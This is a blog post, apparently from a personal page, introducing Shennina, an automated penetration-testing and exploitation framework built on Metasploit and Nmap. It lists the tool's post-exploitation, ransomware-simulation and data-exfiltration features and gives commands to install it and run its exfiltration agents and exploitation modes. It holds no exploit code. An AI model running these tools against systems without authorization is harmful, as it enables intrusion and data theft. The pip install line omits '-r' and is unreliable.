banner
andrewji8

Being towards death

Heed not to the tree-rustling and leaf-lashing rain, Why not stroll along, whistle and sing under its rein. Lighter and better suited than horses are straw sandals and a bamboo staff, Who's afraid? A palm-leaf plaited cape provides enough to misty weather in life sustain. A thorny spring breeze sobers up the spirit, I feel a slight chill, The setting sun over the mountain offers greetings still. Looking back over the bleak passage survived, The return in time Shall not be affected by windswept rain or shine.
telegram
twitter
github

Automated Host Penetration Testing Tool

image
Shennina is a powerful automated host penetration/vulnerability exploitation framework. The main purpose of this project is to achieve complete automation of security scanning, vulnerability scanning/analysis, and vulnerability exploitation development using artificial intelligence technology. Shennina integrates the powerful network security tools Metasploit and Nmap to implement some of its functions and perform penetration testing. In addition, the tool also integrates a command control server to automatically filter data from the target host.

Function Introduction

  1. Implements an automated self-learning method to find vulnerability exploitation solutions.
  2. Uses hosted concurrent design to achieve high-performance operation.
  3. Intelligent cluster penetration testing/vulnerability exploitation.
  4. Post-exploitation capabilities.
  5. Deception attack detection.
  6. Ransomware simulation capabilities.
  7. Automatic data filtering.
  8. Optional vulnerability scanning mode.
  9. Heuristic mode for obtaining recommended penetration testing solutions.
  10. Supports Windows, Linux, and macOS agents.
  11. Scripted attack/penetration mode in the post-exploitation phase.
  12. Provides kernel-based vulnerability exploitation/penetration solution recommendations.
  13. Provides out-of-band technology testing for vulnerability exploitation solutions.
  14. Automatically filters important data from the target server.
  15. Report generation.
  16. Covers 40+ TTPs in the MITRE ATT&CK framework.
  17. Supports multiple input targets.

Tool Download
Since this tool is developed based on Python, we first need to install and configure the Python environment on our local device. Next, we can use the following command to clone the source code of the project to our local machine:

git clone https://github.com/mazen160/shennina.git

Then, use the pip command and the requirements.txt file provided by the project to install the required dependencies for the tool:

cd Shennina
pip install requirements.txt

In addition, we can also directly access the Release page of the project to download the latest release version of the tool.

Tool Execution
Exfiltration Server - Agent
Linux/macOS

./exfiltration-server/agent.sh

Windows

./exfiltration-server/agent.ps1

Exfiltration Server - Run

$ cd ./exfiltration-server/
$ ./run-server.sh

MSFRPCD Server

./scripts/run-msfrp.py

Run Service Scan

$ ./shennina.py --lhost metasploit-ip --target target.local --service-scan-only

Run Shennina in Training Mode

$ ./shennina.py --training-mode --lhost lhost.local --target training-target.local

Exploitation Mode

$ ./shennina.py --lhost lhost.local --target target.local --exploitation-mode

Exploitation Mode - Heuristic

$ ./shennina.py --lhost lhost.local --target target.local --exploitation-mode --secondary-mode

Project Address
Shennina: https://github.com/mazen160/shennina

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.